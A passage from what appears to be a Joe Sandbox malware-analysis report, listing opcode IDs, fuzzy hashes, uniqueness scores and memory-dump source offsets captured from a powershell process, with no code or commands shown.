                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1c0edcae9fe7352814f4efa9fbeff488d9ff9a02908cde32c8b05fa46ec4b75
                                  • Instruction ID: 338a9eb0c0c0624fa8192be31f106206feb2a0163e260ec6aaff0d59c021f94e
                                  • Opcode Fuzzy Hash: d1c0edcae9fe7352814f4efa9fbeff488d9ff9a02908cde32c8b05fa46ec4b75
                                  • Instruction Fuzzy Hash: 90418AB4E0465A9BDB14DFA5C44079EBBF2AF84304F248429E841BB345DB74A94ACBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38ceec49a51121876781e9648e5c2d2561dc20196141f999601fa0cf6d2ffba7
                                  • Instruction ID: c17dad548d6ca92d45af92dd1c09d7c2bafa8ead9303ebacb0b099ca86bcc4b8
                                  • Opcode Fuzzy Hash: 38ceec49a51121876781e9648e5c2d2561dc20196141f999601fa0cf6d2ffba7
                                  • Instruction Fuzzy Hash: 5B418FF6A002158BDF14CF69C5503EEF7F1AF88259F044025D846EB390EB75AE45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 387a46a1ee2aaaf73af4b39f24d1cedb85b1265207a3a7bdc288d4882ffaabf2
                                  • Instruction ID: 11a8237545c0e7e43e1e924517c5c8bb7754101c8be0ee0e00e85062fcf4a44a
                                  • Opcode Fuzzy Hash: 387a46a1ee2aaaf73af4b39f24d1cedb85b1265207a3a7bdc288d4882ffaabf2
                                  • Instruction Fuzzy Hash: A2417CB0E0465A9BDB14DFA5C4407AEFBF2BF84304F158429E945BB344DBB4A949CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fcbe140c9d6dd299a1072675290cf09d12ed78fee4c8ae1ce25ac7b3495c9e80
                                  • Instruction ID: 7c4d8e74845e111b793c33ab93418a217bb3f9fbddcfe7421515b43e8374ab2d
                                  • Opcode Fuzzy Hash: fcbe140c9d6dd299a1072675290cf09d12ed78fee4c8ae1ce25ac7b3495c9e80
                                  • Instruction Fuzzy Hash: 7B415170A042558FCB68CF79C884AADBBF2BF88311F148069E916EB361DB75DA41CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: feef6da107f291a7c6160956d99c51ae00c4c40c89a96f435cc7062d1bbf67d4
                                  • Instruction ID: 0435c0aecc92384b50ca2e0818adc931a87c5951fe8947f090d669cba46d5e27
                                  • Opcode Fuzzy Hash: feef6da107f291a7c6160956d99c51ae00c4c40c89a96f435cc7062d1bbf67d4
                                  • Instruction Fuzzy Hash: 2131B7B07042428BDB64AE25D4CD37E77E6BBC9211F14643ED107D6780CF7AA80ACB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11dfe8b1b43e49e11fbfa02fbf5f3873f2c6b65b84ebc9a25c6b9dddad2f8b23
                                  • Instruction ID: bd111aeccccbed3341b64f75c0ac8d1d01749d06ca6dbcb7d60c93e20785ddaa
                                  • Opcode Fuzzy Hash: 11dfe8b1b43e49e11fbfa02fbf5f3873f2c6b65b84ebc9a25c6b9dddad2f8b23
                                  • Instruction Fuzzy Hash: A53181B5B011099FDB44DB78D890AAEB7B6FF85314F158069E80ADB351DB30ED01CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 179d88f0682dba30dd3e84a1aa57e76e8e3916918e67cdc8bee30624ce88f579
                                  • Instruction ID: 44818046a70a5f7c452bd9471a4fa2f959df6bfa49b4dd2a92cd0dad7818d526
                                  • Opcode Fuzzy Hash: 179d88f0682dba30dd3e84a1aa57e76e8e3916918e67cdc8bee30624ce88f579
                                  • Instruction Fuzzy Hash: 8B316FB4B046068FCB14DF6AD88199ABBFAFF85310F1481A9E504DB265DB34EE01CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 427094ca8839cb0dd49b2925b2f95d42302869a3fbd8048f519b23ebf9068b80
                                  • Instruction ID: fbc80b03771061eb4045955309b9a95140cbfa733a95f2cbc2dd2aa911c1217b
                                  • Opcode Fuzzy Hash: 427094ca8839cb0dd49b2925b2f95d42302869a3fbd8048f519b23ebf9068b80
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34e06f41b371ce476b32250ae13a0d6b5e18db1e94b191acf23005e3ba77ce89
                                  • Instruction ID: 983314bac6e8584cd54275da50e3b33b9bd0f8035ee07a2ec34179adf58421d7
                                  • Opcode Fuzzy Hash: 34e06f41b371ce476b32250ae13a0d6b5e18db1e94b191acf23005e3ba77ce89
                                  • Instruction Fuzzy Hash: A211E1327041255FD714A6A9E888B6BB7EAEBC4325F14843AE109D7680CE759C05C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e3878e61f11810bc8726ea60a19a96f35942dad5a4708ff16c2c1539157755
                                  • Instruction ID: b3d8740d80745a3e5c7e192dc31c1613e587e610d740ea65ee5ee6a4d491d099
                                  • Opcode Fuzzy Hash: c1e3878e61f11810bc8726ea60a19a96f35942dad5a4708ff16c2c1539157755
                                  • Instruction Fuzzy Hash: 3411E071B052429BCB01DBA8D8509EFB7A2EFC6311F04447AE548FB341EB349D058BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbaf7993f8e9528df532c181e6b70f6ef7bb32f76328d2d18d4a84c62eda8cde
                                  • Instruction ID: 2eaefe8b9d39137547f1a84358b5a4b1b2b994fe0b52a9be50e843a70ca3268e
                                  • Opcode Fuzzy Hash: dbaf7993f8e9528df532c181e6b70f6ef7bb32f76328d2d18d4a84c62eda8cde
                                  • Instruction Fuzzy Hash: EA1190707002058FDB149B64C958BAEBBF2AF88711F204469E442EB3E1DF769D40CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e5aee08feb87ff7acd20376b5c1f2d839394ca17096ae66745b1f125001aa15
                                  • Instruction ID: 1145bceafff0d36faf1a9cbc3a7899eebdfb56b702992792406d9e98432bbfa5
                                  • Opcode Fuzzy Hash: 0e5aee08feb87ff7acd20376b5c1f2d839394ca17096ae66745b1f125001aa15
                                  • Instruction Fuzzy Hash: 4001F5F17041924BEB301E1D94C87FEF7E69B82311F298077E845DBA42CD25CD8157A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e58f163fb4a0655870f89c5c00f9e7ca539f1c49222aa124bf28b5996b87376
                                  • Instruction ID: 2e7938b07fefa0d764cbf7284d12a05e3d464f968a3789bfbec4a59c98b6e9f2
                                  • Opcode Fuzzy Hash: 1e58f163fb4a0655870f89c5c00f9e7ca539f1c49222aa124bf28b5996b87376
                                  • Instruction Fuzzy Hash: C801B1B27146224BEB209A79D5C87B273D8DF40765F0544BEE809CB291D679FD408781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e42f8a6640327ec15fc05593ed044487cfb6c4aabc953b7510afcdfa5d7da9e
                                  • Instruction ID: eb1383de393820305ae70aff0ca43299bee1ae32e1b99eb7503a1b83c165bdb1
                                  • Opcode Fuzzy Hash: 6e42f8a6640327ec15fc05593ed044487cfb6c4aabc953b7510afcdfa5d7da9e
                                  • Instruction Fuzzy Hash: A601D6B121D394ABCB115B358814BAA7FA99FC2600F15806BE645CB791D57DC805C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56ff39039f9e19c87e900b383e9d227d44776a481ce8d37dcdc47091b381c7df
                                  • Instruction ID: 609de422773cc621176506779e2605775437905350cba6d6516f1002be4a4fcc
                                  • Opcode Fuzzy Hash: 56ff39039f9e19c87e900b383e9d227d44776a481ce8d37dcdc47091b381c7df
                                  • Instruction Fuzzy Hash: DE113D75E002089FCB44DFA9D4859EEBBF6FB8C210F14842AEA05E7354DB319D158FA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 148c5db02d1319fbd76fea37151d0199aca3fbdfe2b6fb8e4f5c1060e873828e
                                  • Instruction ID: 0065bea4ee03f7b23406627a4c90147c555fcb0dbe5abd144109ba53dff916aa
                                  • Opcode Fuzzy Hash: 148c5db02d1319fbd76fea37151d0199aca3fbdfe2b6fb8e4f5c1060e873828e
                                  • Instruction Fuzzy Hash: E101F9B17125008FCB541A28DACE2BD7373BFCAA25F51151DE1039B7C4CB75AD468A82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6e4d6aad7c171a2c03afe06ada0eef70cf808a900dc3d2c867a073d9373fda3
                                  • Instruction ID: a86b61b72c539eac9f932243eb92e7e88092a77c09853f67d6646dfd734e824a
                                  • Opcode Fuzzy Hash: f6e4d6aad7c171a2c03afe06ada0eef70cf808a900dc3d2c867a073d9373fda3
                                  • Instruction Fuzzy Hash: 19115CB0A14659DFDB209FA0DCD8AEE7BB5FF48715F044429E003AA261CB71A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7688453f017fd33ab0ee895541df10a20af706fd380ec1da7be94fc98f196bc2
                                  • Instruction ID: 07af3061f940f45cd5351c08d7a83c54b80fcc93d9d6f79802181449184f84ff
                                  • Opcode Fuzzy Hash: 7688453f017fd33ab0ee895541df10a20af706fd380ec1da7be94fc98f196bc2
                                  • Instruction Fuzzy Hash: 131126B0B052905FD7118B649C10BFF7FB19F85700F1440AAE544EB2D2CAB45915CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b91d6a066748284e5d3845164c486f05644e01fb43ae7d58c9c16f4edc0bac5
                                  • Instruction ID: ac7eaac9e4a6ababa3b3fd1630d99b585751cbf93510b9dce5bc5b64167ab589
                                  • Opcode Fuzzy Hash: 9b91d6a066748284e5d3845164c486f05644e01fb43ae7d58c9c16f4edc0bac5
                                  • Instruction Fuzzy Hash: C6116DB0E0525AAFDB48DFA5D844AEEFFB2AF48314F14812AE854B7250C7748950CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99ea99507b621270ad54f4c506a05dbc04750e7cd446a62c4a952331cf0be197
                                  • Instruction ID: f71d4909b62fefeeae99ec712fe34a870b3825c60939f1c1cc99c8a6296e77d2
                                  • Opcode Fuzzy Hash: 99ea99507b621270ad54f4c506a05dbc04750e7cd446a62c4a952331cf0be197
                                  • Instruction Fuzzy Hash: 0E01F2313093A11FC3068AA4AC589FF7FAADFC626170800ABE600DB252DB744C0687E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a37d3ece20ff1ba9f290a8edddd69a2ae4717246dc0d1637503e9b4b03fb48e
                                  • Instruction ID: 0693a3199f6fb34ba8c304449d401b779973ab2daed23c01cb8dfa08283d9417
                                  • Opcode Fuzzy Hash: 5a37d3ece20ff1ba9f290a8edddd69a2ae4717246dc0d1637503e9b4b03fb48e
                                  • Instruction Fuzzy Hash: DD118871A14154CFCB689BA9D8805EDB3F2FB89722F148069E902EB711CB75AA01CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d5b46fbd23c00a9b1247becbc36d3e1f71859d6eb81feb0df5d41ca3544718b
                                  • Instruction ID: 6e699f5fcb9356fc9ff1a9f1b237316beba4b2024b2b4b589237f41e1a3f82e3
                                  • Opcode Fuzzy Hash: 7d5b46fbd23c00a9b1247becbc36d3e1f71859d6eb81feb0df5d41ca3544718b
                                  • Instruction Fuzzy Hash: 49016970B006069BCB11DB68D8519EFB3E6EFC5315F044439E918FB344EB34A9058BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8dd3ed746643932d2cea4fc8cf0bedd782fbfbbdd52b03ddc48af4fc833297b7
                                  • Instruction ID: 4dd770ed841f4c5716ea6c5d68378e0e39db1ab29ecfb9039a057de9c141c2df
                                  • Opcode Fuzzy Hash: 8dd3ed746643932d2cea4fc8cf0bedd782fbfbbdd52b03ddc48af4fc833297b7
                                  • Instruction Fuzzy Hash: C701FDF17097128FDB318E25C5C8B6237E89F41654F0A44AEE809CB2A2D779FE048792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a96c90bb8ec852a0e334b304559c68b81ced34996fff841aad12de2c1245b348
                                  • Instruction ID: 20e3a8f4fd390df69f908fc3ea21cf6b64460ac6b7e2f947b608f31b503b20bf
                                  • Opcode Fuzzy Hash: a96c90bb8ec852a0e334b304559c68b81ced34996fff841aad12de2c1245b348
                                  • Instruction Fuzzy Hash: C001F2B0B00215ABE7149B58DC10BBFBBB6EBC5711F24407AF644AB2C1CBB0A915C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dde4312fa4a9e608b395c8d6ecffe02c809388edc38291a1708d6c7e58afd160
                                  • Instruction ID: a4e0e69aab33cde8df540f7c6b4e0c2095ca3519d1f526c8c212c5d020c6670a
                                  • Opcode Fuzzy Hash: dde4312fa4a9e608b395c8d6ecffe02c809388edc38291a1708d6c7e58afd160
                                  • Instruction Fuzzy Hash: BEF0F4313492605FC3048A68E8449FE7FAAEFC6221B14006BE201DB251CB744C038791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4920d7386c80dc884d1ecd7705155f6993fbbffae030bd79d6bf418c7b7ceaf
                                  • Instruction ID: 569c96ca3a0ed3c124f838cb8d5a40b052bcc4e0f8a79d6ee98a9a904393cde5
                                  • Opcode Fuzzy Hash: b4920d7386c80dc884d1ecd7705155f6993fbbffae030bd79d6bf418c7b7ceaf
                                  • Instruction Fuzzy Hash: 7701F2B0B002556BE7109B989C10BBFBFB6DB85701F24407AE608AB6C1CBB06915C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b19f945f902803c3c7467cca29b28d3d8982a3a9146518ddc006590b3bc7fa0
                                  • Instruction ID: c2a5c96934097c82799f0740e12c7194399abbda5babc3d91bcbd585a808a2d8
                                  • Opcode Fuzzy Hash: 0b19f945f902803c3c7467cca29b28d3d8982a3a9146518ddc006590b3bc7fa0
                                  • Instruction Fuzzy Hash: 6801F2B0B052556FE7108BA89C10FFFBFB69B85701F24417AE548AB6D2CBB05915CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1671476810.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_83d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a2379d9efe32a60df2b603fcf646bec82ac67e2c4e6f1d3a0028ea1ff82bb1f
                                  • Instruction ID: 1b546e31126ae71b44b8a3309c1476701c0af680ffbc208f02b084c354017260
                                  • Opcode Fuzzy Hash: 5a2379d9efe32a60df2b603fcf646bec82ac67e2c4e6f1d3a0028ea1ff82bb1f
                                  • Instruction Fuzzy Hash: 5E01FC3140878499E7148A25DCC4B6AFFD8EF81B68F18C059ED499B186C3799841C6F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0dbb9aeca82a1453b697e39588a57e9fe1c75bba8f0a6efc2621dd57164bb7c8
                                  • Instruction ID: cdcb2a58661d67b9c84106ef217b0c6ec644d874f4b0207f1947893395ee9b98
                                  • Opcode Fuzzy Hash: 0dbb9aeca82a1453b697e39588a57e9fe1c75bba8f0a6efc2621dd57164bb7c8
                                  • Instruction Fuzzy Hash: EDF04CF6205365ABCB204A258800FEBFFED9F81640F05406BF905CB291C135C801C3A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecd189eab41b67aa06e51687ff533ecd7988a71cd617d43ff5d013daae2c937f
                                  • Instruction ID: 4b85db74baa1412bbf8b715b9c60f0a574a9bce831d1eafa50681cde0a270435
                                  • Opcode Fuzzy Hash: ecd189eab41b67aa06e51687ff533ecd7988a71cd617d43ff5d013daae2c937f
                                  • Instruction Fuzzy Hash: 45017875604389DFCB06DF68C8418CD7B71BF86220B6241A6E9519B3A2D3359D16CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bbc189a4102d6e3cb762737b242234862bb2f6afce4a204e8df86ce931a2aba
                                  • Instruction ID: 32a7c66d2f7a7c01d59e28810816bd526b342a94f3d266a8de99473b1e300a68
                                  • Opcode Fuzzy Hash: 7bbc189a4102d6e3cb762737b242234862bb2f6afce4a204e8df86ce931a2aba
                                  • Instruction Fuzzy Hash: F8017871301745CFC7289EA9E084B96B3E5EF86321F04096DE4CA87651CB31E886CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37986756c06e5b827b541efcaeb73178cdd39ec2295af217f49413e830e84b7e
                                  • Instruction ID: d1aecc5efaa0b5a0ac51fae9220c02b739b86aa1bae56e223746a439fdd5135c
                                  • Opcode Fuzzy Hash: 37986756c06e5b827b541efcaeb73178cdd39ec2295af217f49413e830e84b7e
                                  • Instruction Fuzzy Hash: 0AF046717046049FC320AB19E8C58AEBBE5EBC1321B59C42EE00DCB751CE25AC0B4791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db36f9a058f4118507168d68b4a545538e6f698fa67554489206235b98f83e1f
                                  • Instruction ID: d4d30ea24236d390e9668a0017bed141ce860122dece6196890f12aec34fab85
                                  • Opcode Fuzzy Hash: db36f9a058f4118507168d68b4a545538e6f698fa67554489206235b98f83e1f
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 821d512a02bb0a673e6f06de9a3002d3b2b211d3ab23b3bd2a1d0e087d0e26e2
                                  • Instruction ID: 4a2315fbf6632174977fd6abae0fef49b71d98570d7dc200bda8aba29fdd1166
                                  • Opcode Fuzzy Hash: 821d512a02bb0a673e6f06de9a3002d3b2b211d3ab23b3bd2a1d0e087d0e26e2
                                  • Instruction Fuzzy Hash: AAB09B36B25014CB8B04555574894FCB325D6C8165B109077D127D1041C73695194651
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a4e647a5e585f265a4db112f29859b5112f0a6e31f9eb83ff584f7fff0a5f60
                                  • Instruction ID: 66e8e8afc5373e3d2b005b45721f69ed94b2a381a190473dd967dbd63d8050b7
                                  • Opcode Fuzzy Hash: 8a4e647a5e585f265a4db112f29859b5112f0a6e31f9eb83ff584f7fff0a5f60
                                  • Instruction Fuzzy Hash: FEC012B684838ADF8F24CFA4A8008D9BB70FF46204F000886F922AB101D3708634CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6774614728cb6b569c4d4069820ba90426695be68b2de99c94ad049e90f140ce
                                  • Instruction ID: deaefe20daa1fed4f4e9e1102cd6b042fd3912259740700e36ab36da5370e3a1
